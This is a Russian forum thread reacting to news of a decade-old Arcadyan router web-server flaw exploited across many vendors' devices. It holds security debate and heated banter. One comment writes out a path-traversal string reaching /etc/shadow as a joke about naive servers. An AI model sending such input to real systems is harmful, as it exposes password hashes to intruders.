The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей"  +/
Сообщение от opennews (??), 09-Авг-21, 11:14 
В сети зафиксирована массовая атака на домашние маршрутизаторы, в прошивках которых используется реализация http-сервера от компании Arcadyan. Для получения управления над устройствами применяется сочетание двух уязвимостей, позволяющих удалённо выполнить произвольный код с правами root. Проблема затрагивает достаточно большой спектр ADSL-маршрутизаторов от компаний Arcadyan, ASUS и Buffalo, а также устройств, поставляемых под брендами Билайн (проблема подтверждена в Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone и других операторов связи. Отмечается, что проблема присутствует в прошивках Arcadyan уже более 10 лет и за это время успела перекочевать как минимум в 20 моделей устройств от 17 различных производителей...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=55609

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +12 +/
Сообщение от Аноним (1), 09-Авг-21, 11:14 
это какой-то дибиликон
Ответить | Правка | Наверх | Cообщить модератору

4. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +17 +/
Сообщение от OnTheEdgeemail (ok), 09-Авг-21, 11:15 
дЫры в каждый дом!
Ответить | Правка | Наверх | Cообщить модератору

88. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +6 +/
Сообщение от Брат Анон (ok), 09-Авг-21, 14:54 
Они говорили теперь подключение в публичных местах только по паспорту.
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

258. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 14:32 
> Они говорили теперь подключение в публичных местах только по паспорту.

Пришлите на mirai пуллреквест, чтобы паспорт у юзера спрашивал?

Ответить | Правка | Наверх | Cообщить модератору

136. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +5 +/
Сообщение от Аноним (-), 09-Авг-21, 17:27 
На 20-й год Зоркий Глаз все же нашел старые грабли и наступил на них второй раз.
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

291. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:30 
Важно уточнение: грабли были детские.
Поэтому было важно наступить именно два раза.
Ответить | Правка | Наверх | Cообщить модератору

221. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Хакер (?), 10-Авг-21, 00:47 
У меня всеравно только порнуха на компе!
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

232. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +6 +/
Сообщение от Аноинм (?), 10-Авг-21, 10:40 
> У меня всеравно только порнуха на компе!

Ну тогда и ник смени. Например на др@чер. Честнее будет :)

Ответить | Правка | Наверх | Cообщить модератору

317. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от vitektm (?), 11-Авг-21, 17:42 
Не удивлюсь если даже дистриб winrar 2.8 и winamp :)
Ответить | Правка | К родителю #221 | Наверх | Cообщить модератору

3. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (3), 09-Авг-21, 11:14 
Потому что не надо пихать коричневую поделку одного вендора везде. Решил не проявлять оригинальность и сделать как у конкурента - ошибку перетянул себе.
Ответить | Правка | Наверх | Cообщить модератору

6. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +19 +/
Сообщение от Ruslan (??), 09-Авг-21, 11:19 
А надо было каждый раз с нуля веб-сервер писать для каждой модели роутера?)
Ответить | Правка | Наверх | Cообщить модератору

8. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от OnTheEdge (ok), 09-Авг-21, 11:23 
надо было просто поставить nginx

upd: сарказм!

Ответить | Правка | Наверх | Cообщить модератору

10. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +10 +/
Сообщение от piconim (?), 09-Авг-21, 11:28 
который весит столько же, сколько остальная операционка в этих роутерах
Ответить | Правка | Наверх | Cообщить модератору

137. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 17:30 
Ну не столько. И можно собрать в минимальном варианте. Я так делал, на топоавом мипсе очень даже почтенно файло с харда грузит. Но там флеша, правда, 16 мегз, можно попижонствовать.
Ответить | Правка | Наверх | Cообщить модератору

14. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от ryoken (ok), 09-Авг-21, 11:50 
Вот на роутере этого мамонта только не хватает.
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

57. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от anonymous (??), 09-Авг-21, 13:21 
Почему сарказм? ЕМНИП, в кинетиках nginx, и ничего, все довольны. Из таких нетиповых решений, как в новости, у них SMB-сервер, пришедший на смену заброшенной Samba 3.x, но они это и не скрывают.
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

73. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +3 +/
Сообщение от Аноним (291), 09-Авг-21, 14:12 
Компания Zyxel вообще очень серьезно относится к безопасности, судя по дефолтным паролям на админа 1234 (через несколько лет все-таки поменяли на cloud1234).
Ответить | Правка | Наверх | Cообщить модератору

86. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +5 +/
Сообщение от YetAnotherOnanym (ok), 09-Авг-21, 14:49 
Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с формой для смены пароля. Да, там есть кнопка "Игнорировать", но это уже решение владельца. Так что к инженерам зухела по этому вопросу претензий быть не должно. Они предупредили и дали возможность принять меры.
Ответить | Правка | Наверх | Cообщить модератору

133. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (291), 09-Авг-21, 17:23 
> Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с формой для смены пароля. Да, там есть кнопка "Игнорировать", но это уже решение владельца.

Неловко получается, если зашел не владелец.

Ответить | Правка | Наверх | Cообщить модератору

140. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 17:51 
Ну так зашедший и сменит пароль :)))
Ответить | Правка | Наверх | Cообщить модератору

272. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Michael Shigorinemail (ok), 10-Авг-21, 21:48 
> Неловко получается, если зашел не владелец.

В смысле?  Теперь он владелец. :]

Ответить | Правка | К родителю #133 | Наверх | Cообщить модератору

211. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (211), 09-Авг-21, 22:45 
> Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с
> формой для смены пароля. Да, там есть кнопка "Игнорировать", но это
> уже решение владельца. Так что к инженерам зухела по этому вопросу
> претензий быть не должно. Они предупредили и дали возможность принять меры.

Да, у них просто поддержка устройств заканчивается, и даже прошивок, их же, не закачать, просто:
"Рекомендуем вам приобрести новое устройство из текущей линейки продуктов".
Вот такой вот офигенный Zyxel с его искусственным устареванием.
Никогда больше с этими жлобами хитрозадыми я не буду иметь никаких дел! И всем родственникам и знакомым буду рекомендовать не связываться с этим дном, а то иш, дрессировать они пользователя собрались!
ТОЛЬКО СОВМЕСТИМЫЕ c OpenWRT девайсы, на которые без бубна можно этот самый OpenWRT накатить!

Ответить | Правка | К родителю #86 | Наверх | Cообщить модератору

72. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (291), 09-Авг-21, 14:06 
>  надо было просто поставить nginx

В задачу веб-сервера не входит нормализация REQUEST_URI.

Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

27. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Урри (ok), 09-Авг-21, 12:13 
Причем со своими, уникальными ошибками.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

74. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 14:12 
Которых никто не знает, в отличии от массовых.
Ответить | Правка | Наверх | Cообщить модератору

81. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 09-Авг-21, 14:25 
"Не пугайте страусов, пол бетонный"

Security by obscurity ("прячем голову в песок и делаем вид, что мы в ебзопасности") работает только для неуловимых Джо.
Если роутер продукт занимает хоть сколько-нибудь значительную долю рынка - в эту группу он уже не попадает.

Ответить | Правка | Наверх | Cообщить модератору

112. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от ryoken (ok), 09-Авг-21, 16:38 
>> "в ебзопасности"

Вот хорошее слово, правильно написали :).

Ответить | Правка | Наверх | Cообщить модератору

95. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 15:00 
> Которых никто не знает, в отличие от массовых.

Надо будет злоумышленникам - узнают и применят. Это как распространять закрытый шифр или программу с закрытым исходным кодом и вместе с тем надеяться, что никто никогда не найдёт там ошибок, ведь "их никто не узнает"

Ответить | Правка | К родителю #74 | Наверх | Cообщить модератору

85. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (85), 09-Авг-21, 14:43 
Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво, но если надо готовое с функционалом побогаче - их навалом в опенсорсе, зачем какое-то мутное проприетарное говно тянуть? Иначе как садомазохизмом и тупостью такое не объяснить.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

107. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –4 +/
Сообщение от пох. (?), 09-Авг-21, 15:51 
> Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво

и отдает твой ../../../../..////etc/shadow за время меньшее, чем откупорить новое пиво. Кстати, подскажи, зачем роутеру - "минимальный" и какой, кстати, ему на самом деле нужен и что должен уметь.

Почему вместо этого г-на не был взят банальный апач (против nginx в эмбедовке сейчас больше чем "за") - спросите девляпса которого наняли вместо архитектора.

Ну а вы чего ждали - за эти деньги, хорошо если он был студентом первого курса, а не отчисленным сразу же с первого.

Ответить | Правка | Наверх | Cообщить модератору

138. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (85), 09-Авг-21, 17:34 
У меня uttpd в роуторе - чуть более, чем самый минимальный, но всё равно в 1 си-портняку влезает. И очевидно что его хватает, так зачем же тащить что-то более жирное? Чем жирнее сырцы, тем выше вероятность ошибки.
Ответить | Правка | Наверх | Cообщить модератору

143. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от пох. (?), 09-Авг-21, 17:56 
прости, а зачем у тебя в роутере бесполезное ненужно?
Очевидно что его "хватает" для абсолютно ничего, поскольку он ничегошеньки и не умеет.

Я могу понять его на "дрисктопе", когда нужно срочно выложить брату-васяну файлик а более разумный способ в голову не пришел (или никого там не застал) а на роутере обычно веб-сервер совсем-совсем для другого.

Ответить | Правка | Наверх | Cообщить модератору

155. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (85), 09-Авг-21, 18:41 
О, да у нас тут иксперд в треде! uttpd кроме статики умеет Lua скрипты выполнять, а больше действительно ничего на роуторе не нужно от сервера.
Ответить | Правка | Наверх | Cообщить модератору

233. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 10:41 
> прости, а зачем у тебя в роутере бесполезное ненужно?

Вебморду рисовать, вероятно. Для минимальной морды его хватит, не? Или тебе там надо апача-на-рельсах? :)

Ответить | Правка | К родителю #143 | Наверх | Cообщить модератору

239. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 11:44 
> Вебморду рисовать, вероятно.

в стиле цельнозолотых часов и телефона Хоттабыча, которые очень впечатляли, только пользы от них было ровно никакой.

Внезапно, вебморду надо не "рисовать". (ее может вообще не быть нарисованной, вон как у vbox, которому ее за 15 лет нишмагли нарисовать штатную. А вебморда при этом - есть.)

Она командочки в систему должна скармливать, и больше ни для чего вообще не нужна.

Ответить | Правка | Наверх | Cообщить модератору

251. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 13:45 
> в стиле цельнозолотых часов и телефона Хоттабыча, которые очень впечатляли, только пользы
> от них было ровно никакой.

Ну я uhttpd на каком-то модеме видел. А, да, модемы нынче так то тоже иной раз прикидываются эзернетом, и, вот, с серваком для настройки. Даже XHR немного умело, статистику сигнала, статус конекции и что там еще рефрешить. Я даже почесал репу с сделал "RPC" на паре шелскриптов и curl, который тягает все это или передергивает конект без гребаных браузеров - шли б они с браузером на мелких ARMах в автопилоте...

В принципе я что-то похожее сам научился делать, в лине это довольно просто, если железо умеет device. Могу типа-эзернет-сетевку вывесить по usb, а где она там интернет возьмет - ну, может и с вон того модема/модуля.

> Внезапно, вебморду надо не "рисовать". (ее может вообще не быть нарисованной, вон
> как у vbox, которому ее за 15 лет нишмагли нарисовать штатную.
> А вебморда при этом - есть.)

Спасибо, Кэп.

> Она командочки в систему должна скармливать, и больше ни для чего вообще не нужна.

Ну вон см. выше что с ним делали на модеме каком-то "относительно умном". Не знаю кто XHR рюхал, может и сам uhttpd подпатчили.

Ответить | Правка | Наверх | Cообщить модератору

275. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 10-Авг-21, 22:00 
> Почему вместо этого г-на не был взят банальный апач (против nginx в
> эмбедовке сейчас больше чем "за")

Тогда уж boa какой?

Ответить | Правка | К родителю #107 | Наверх | Cообщить модератору

276. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 10-Авг-21, 22:13 
ну я в сортах не разбираюсь, а этих двух использую много лет - поэтому вполне уверен, что для роутера сойдут.

(в отличие от недосерверов из 100 строк на си, не умеющих ничего кроме плейнтекст и тот криво)

Ответить | Правка | Наверх | Cообщить модератору

295. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 11:49 
А на роутере ничего кроме плейнтекста и не надо.

1. Жать что-то на хилом проце? На жирном локальном линке? Э, ты там точно системщик? Или ты решил HTTP/2 попродвигать? Ну нет, быстрые вебморды так то хорошо, но не ты ли его в соседних коментах крыл? Да и профита на вот именно локальном линке от мультиплексирования будет мизер, там RTT никакой.
2. Шифровать? На хилом проце? С openssl, который половину флехи занимает? А, да, и на что там сертификат выписывать?

Так что в принципе - you can get away with it. Однако вулнов у наивного чукотского юноши там будет... хаксор тупо скачает конфигурацию и сможет узнав пароль зайти как белый человек. Или если там хеш, зальет свою конфигурацию, с своим паролем.

Ответить | Правка | Наверх | Cообщить модератору

297. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 11-Авг-21, 12:23 
> А на роутере ничего кроме плейнтекста и не надо.

эксперт впопеннета во всей красе. Ему на протяжении пяти итераций объясняют, что не надо как раз - плейнтекст, и вемборда у роутера вовсе не для рисования плейнтекстов.

но он же ж феноменально т-пой.


Ответить | Правка | Наверх | Cообщить модератору

311. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 14:56 
Ну да, ну да, пох нам ща крашкурс изготовления вебморд дадет :). Начинайте, Профессор, я записываю.
Ответить | Правка | Наверх | Cообщить модератору

108. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +6 +/
Сообщение от Аноним (108), 09-Авг-21, 15:52 
Привет, программист компании Arcadyan
Ответить | Правка | К родителю #85 | Наверх | Cообщить модератору

145. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от пох. (?), 09-Авг-21, 18:00 
> Привет, программист компании Arcadyan

не, это не программист, это уборщица (по совместительству - девляпс) из той же компании. Она даже не в курсе, зачем тот сервер был нужен, судя по ссылке на феерическое бесполезное ненужно, умеющее исключительно статику без авторизации. Не факт что и без уязвимостей, неуловимый джо никому не нужен копаться в его кишках.

(если что, djb более приличное написал двадцать лет назад https://cr.yp.to/publicfile.html - но на роутере оно тоже вопиюще неуместно)

Ответить | Правка | Наверх | Cообщить модератору

156. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от Аноним (85), 09-Авг-21, 18:42 
Какой ссылке? Ты нaркоман? Я тебе никаких ссылок не давал.
Ответить | Правка | Наверх | Cообщить модератору

203. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 21:37 
> Какой ссылке? Ты нaркоман? Я тебе никаких ссылок не давал.

Он не наркоман, у него морда от балтики опухла, ничего не подумай.

Ответить | Правка | Наверх | Cообщить модератору

141. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +4 +/
Сообщение от Аноним (-), 09-Авг-21, 17:55 
> Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво,

...и покупается на 9 из 10 таких приколов, ага. Как впрочем и любой сервер на <whatever> писаный под пиво за вечер. Но мы можешь попробовать и запустить потом на этом какой-нибудь сканер безопасности. Потом лог выложи, вместе поблюем на твою предусмотрительность.

Ты недооцениваешь опасность вывешивания ФС всему миру. А вон там и куда более интересные атаки есть.

> но если надо готовое с функционалом побогаче - их навалом
> в опенсорсе, зачем какое-то мутное проприетарное говно тянуть?

Производители дырлинков так то на маркетинг проприетариев ведутся больше.

Ответить | Правка | К родителю #85 | Наверх | Cообщить модератору

146. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 09-Авг-21, 18:03 
> ...и покупается на 9 из 10 таких приколов, ага. Как впрочем и
> любой сервер на <whatever> писаный под пиво за вечер. Но мы

Кстати да, даже netch@ со своим smtp на awk с первой попытки слегка лоханулся.

> можешь попробовать и запустить потом на этом какой-нибудь сканер безопасности. Потом

не поможет, сканеры не на нейросетях пока еще, они ищут только известные дырки в известных серверах, секьюрить бай обскурить тут вполне сработает.

> Производители дырлинков так то на маркетинг проприетариев ведутся больше.

там может и впрямь какие-то удобные для эмбедовки (и прямо противоречащие безопасности) фичи были.
Типа без конфига, одними ключами управляется, еще какая-нибудь бжня в том духе.

лучше не знать.

Ответить | Правка | Наверх | Cообщить модератору

161. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 19:01 
Ну дык, символы с специальной трактовкой штука подлючая, а тут прямо в семантике ФС подстава.

Кто как, а лично я все сетевые сервисы отпиливаю в изолированные неймспейсы, там система лысая получается. Не, даже /etc/shadow не сопрешь, его нет. Оно не сможет это отсервировать даже если б захотело. А ты думал что контейнеры и системд только для хайпа нужны? А вот можно еще хацкерам неудобно делать, чтобы не было как у этого аркадиана :)

Ответить | Правка | Наверх | Cообщить модератору

163. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 09-Авг-21, 19:15 
> Ну дык, символы с специальной трактовкой штука подлючая, а тут прямо в семантике ФС подстава.

ничего что семантика url и отражает семантику fs?

Ну а что ниасиляторы ниасиляют нормализацию и преобразования с проверками ни в одну сторону ни в другую (ничего ужасного от попытки открыть файл %2F в общем-то не случится - но им же зачем-то понадобилось его раскрыть) - проблема современного дерьмософта.

> А ты думал что контейнеры и системд только для хайпа нужны?

мне не нужен дерьмософт который можно только в дальнем конце полигона запускать, быстроподнятый не считается упавшим и т д.  Потому что внезапно выясняется, что через уязвимость доступны ровно те данные с которыми дерьмософту и полагается работать - и те процессы, которые он и должен запускать и с ними взаимодействовать. И что сынку, помогли тебе контейнеры в контейнерах под контейнерами?

Хакерам неудобно делает софт в котором нет таких детских багов. И его на мой век хватит, в общем-то.

Ответить | Правка | Наверх | Cообщить модератору

180. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 20:42 
> ничего что семантика url и отражает семантику fs?

Да, но сочетание URL Encoding + вот этой фичи делает это чуть менее очевидным для фильтра. А файлухе, вот, похрен.

> Ну а что ниасиляторы ниасиляют нормализацию и преобразования с проверками

Ну они просто видимо сперва фильтры, потом декод урлы. А фильтрануть уже декодированое - упс. На самом деле за это хотелось бы оторвать бошку и IETF за синтаксис урл, и десигнерам такой семантики ФС :)

> мне не нужен дерьмософт который можно только в дальнем конце полигона запускать,

Т.е. почти весь. Ну, не, если ты только qmail будешь запускать, может и прокатит. Но даже он не без греха.

> запускать и с ними взаимодействовать. И что сынку, помогли тебе контейнеры
> в контейнерах под контейнерами?

Если ты в итоге чисто технически можешь у меня спереть только файлы которые я выложил на даунлоад серваку в его wwwroot - то, таки, помогли. Даже если сервер лажанет, его операционка уже не выпустит. Это конечно отвисание на страховом тросе уже, но хорошо что он был.

Просто "надейся на лучшее, готовься к хучшему". Два уровня защиты лучше чем один. Это примерно как лезть на скалу со страховкой. Скиллы скиллами, а страховка страховкой.

> Хакерам неудобно делает софт в котором нет таких детских багов. И его
> на мой век хватит, в общем-то.

Да как знать, как знать. Оптимизм насчет свойств софта штука вредная. А если даже и нет детских багов, комбо с заподвыподвертом иной раз может прошляпить и маститый гуру.

Ответить | Правка | Наверх | Cообщить модератору

226. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 09:00 
>> мне не нужен дерьмософт который можно только в дальнем конце полигона запускать,
> Т.е. почти весь.

у меня есть хосты работающие по три-четыре года непрерывно (и перезагружающиеся только из-за проблем с железом). И представь себе, им за это время ни разу не понадобилась суперфича системдряни по перезапуску быстронесчитается.

Ответить | Правка | Наверх | Cообщить модератору

235. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 10-Авг-21, 10:51 
> у меня есть хосты работающие по три-четыре года непрерывно (и перезагружающиеся только
> из-за проблем с железом). И представь себе, им за это время
> ни разу не понадобилась суперфича системдряни по перезапуску быстронесчитается.

Да так то и запасной парашют обычно нафиг не нужен. Однако облом случается если он вдруг все же очень захотелся, а его оказывается нет.

А если сильно долго пушить свою удачу - вон, чувак. По канату без страховки над пропастями ходил, сам же сперва его и натянув, заползя по совершенно непотребным скалам на 2 вершины. И с wing suit-ом летал. В конце концов он видимо решил что у него 100% иммунитет от смерти. И однажды летая птичкой в wingsuit'е он выбрал не очень удачное место, не вписался в поворот - и таки убился о стену. Вот ты, кажется, тоже возомнил что у тебя 100% иммунитет, а это, имхо, не так...

Ответить | Правка | Наверх | Cообщить модератору

277. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 22:18 
> И однажды летая птичкой в wingsuit'е он
> выбрал не очень удачное место, не вписался в поворот - и

и чем бы ему тут помог запасной парашут? Вот и тебе не поможет.

Ответить | Правка | Наверх | Cообщить модератору

296. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 11-Авг-21, 11:51 
> и чем бы ему тут помог запасной парашут? Вот и тебе не поможет.

Да, пох, иногда не поможет даже запасной парашют. Но довольно часто - помогает, и именно поэтому с ним и заморачиваются.

Ответить | Правка | Наверх | Cообщить модератору

227. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 09:08 
>> запускать и с ними взаимодействовать. И что сынку, помогли тебе контейнеры
>> в контейнерах под контейнерами?
> Если ты в итоге чисто технически можешь у меня спереть только файлы
> которые я выложил на даунлоад серваку в его wwwroot - то,

и да, что непонятно в "запускать и взаимодействовать" ? Твой наколенный аналог publicfile из дерьма и палок на роутере нафиг не впился, там обычно, внезапно, система конфигурирования роутера находится, и Arcadyan для нее и был предназначен. Через которую и твою сеть поимеют. И все это вполне может делать именно тот от кого запущен веб-сервер, потому что именно для этого и запущен. А больше там вообще нет ничего (у нормальных людей).

> Просто "надейся на лучшее, готовься к хучшему". Два уровня защиты лучше чем
> один. Это примерно как лезть на скалу со страховкой. Скиллы скиллами,
> а страховка страховкой.

Нет, это в современном исполнении гораздо больше похоже на страховку "от нищастного случая". Ну ту самую, которая покрывает только внезапно упавший на голову кирпич, при условии, разумеется, что ты не работаешь на стройке и не проходишь мимо ближе километра.

Но денежки давай.

Ответить | Правка | К родителю #180 | Наверх | Cообщить модератору

236. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (236), 10-Авг-21, 11:26 
> и да, что непонятно в "запускать и взаимодействовать" ? Твой наколенный аналог
> publicfile из дерьма и палок на роутере нафиг не впился,

Вообще, я lwan для странных вещей предпочитаю. Там автор вроде понимает что делает, про секурити в курсе, fuzzing гоняет. Там вообще может не быть модуля файл сервера. Вон несколько handler'ов прибито на гвозди, и хватит. Однако он все-равно будет отпилен в приватный загон с лысой ФС и нифига бинарей, кроме того с чем он будет взаимодействовать. И ни бита больше. Случаи бывают разные, а запасной парашют хоть и редко нужен, но редкость компенсируется эпичностью момента если он все же понадобился и таки был. Благо это в линухе мне по ресурсам ничего не стоит почти, я ж без доскеров это все, максимально влобовую и низкоуровнево. Системд в этом не самая плохая штука, самому кодить правильную запускалку было бы не прикольно.

> там обычно, внезапно, система конфигурирования роутера находится,

Спасибо, Капитан Очевидность!

> и Arcadyan для нее и был предназначен. Через которую и твою сеть поимеют.

Мою не поимеют, топологией не вышла. И аркадианов там нет. Это кастомный дизайн под странные предпочтения. Just because I can. Я подумал как бы я это ломал, и что я бы хотел при этом меньше всего. А потом пошел и сделал это. Так, вроде, неплохо работает. Но это совсем не хомячково. Вплоть до того что прога вообще в сеть не попадет пока я не пну ее весьма специальным образом. Заодно радикально лечит борзоту всяких хайпующих п-сов, норовящих куда-то соваться без спроса. Ну и как минимум они под радар попадают, после чего я озабачиваюсь заменой "проблемных программ".

> именно для этого и запущен. А больше там вообще нет ничего
> (у нормальных людей).

У нормальных людей сейчас вон та штука, имхо, отожмет их роутер и зафайрволит их оттуда, чтоб под ногами не мешались. Мне в этом сценарии что-то не нравится, поэтому я предпочитаю не уповать что мой окорок спасет добрый корп и полагаю что "если вам надо чтобы какая-то работа была сделана хорошо, ее придется сделать самому".

> Нет, это в современном исполнении гораздо больше похоже на страховку "от нищастного
> случая". Ну ту самую, которая покрывает только внезапно упавший на голову

Простите но какой-нибудь -EPERM или kill процесса на левый сискол это таки вполне себе рывок страховочного троса вида "хрен тебе, а не мордой в асфальт".

> Но денежки давай.

Я, вроде, никому денег не давал. Вот ведь какой нюанс. Просто прицепил страховку и проверил что она крепкая и не дает мордой в асфальт влететь так уж запросто.

Ответить | Правка | Наверх | Cообщить модератору

240. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 11:47 
>> Но денежки давай.
> Я, вроде, никому денег не давал. Вот ведь какой нюанс. Просто прицепил

За лёнину невменяемую блоатварь платят не деньгами так своим временем.

> страховку и проверил что она крепкая и не дает мордой в
> асфальт влететь так уж запросто.

угу - "ваше ведро несовместимо с версией инита". И вместо мордой в асфальт - сразу в рай.


Ответить | Правка | Наверх | Cообщить модератору

253. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 10-Авг-21, 14:01 
> За лёнину невменяемую блоатварь платят не деньгами так своим временем.

1) Доки на блоатварь таки вполне приличные.
2) Кодинг нормальной запускалки с namespaces, шедулерами, приоритетами и проч самому займет даже больше. И можно влепить багов, на поляне которую некому вытаптывать. А потом придет такое же кулхацкерское чмо на мои системы? Да ну нафиг, одну блоатварь проще вытоптать чем 100500 недомерков в стиле "я тоже могу HTTP сервер за вечер".
3) Извини, но я не собираюсь рассказывать что мне офигенно без страховочного троса в моих сервисах, так что дескать оно не надо.

> угу - "ваше ведро несовместимо с версией инита". И вместо мордой в асфальт - сразу в рай.

Ну, у меня этого ни разу не было, а то что ты или твой дистро не могут в системную интеграцию - кто вам таким красивым доктор? Каждый должен заниматься своим делом. И если вы это не умеете, за каким хреном вас в это понесло?!

Ответить | Правка | Наверх | Cообщить модератору

254. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 14:07 
> 1) Доки на блоатварь таки вполне приличные.

ты таки можешь починить мне неработающую загрузку? А, опять "это другое".

> Ну, у меня этого ни разу не было

потому что твой уровень квалификации- нулевой. (по этой же причине для тебя бином ньютона накодить "запускалку с нэймспейсес") Кстати и о "приличных доках". Описание миллиона ненужных закорючек - это вообще не доки.

шаг влево-вправо от принесенного тебе на лопате "твой дистро" - и ты ничего кроме "ни разу не было" сообщить публике не сможешь.

> Каждый должен заниматься своим делом.

кто-то жрет с лопаты, кто-то все еще иногда строит свои системы без невменяемого г-на, где еще возможно.
Угу.

Ответить | Правка | Наверх | Cообщить модератору

262. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
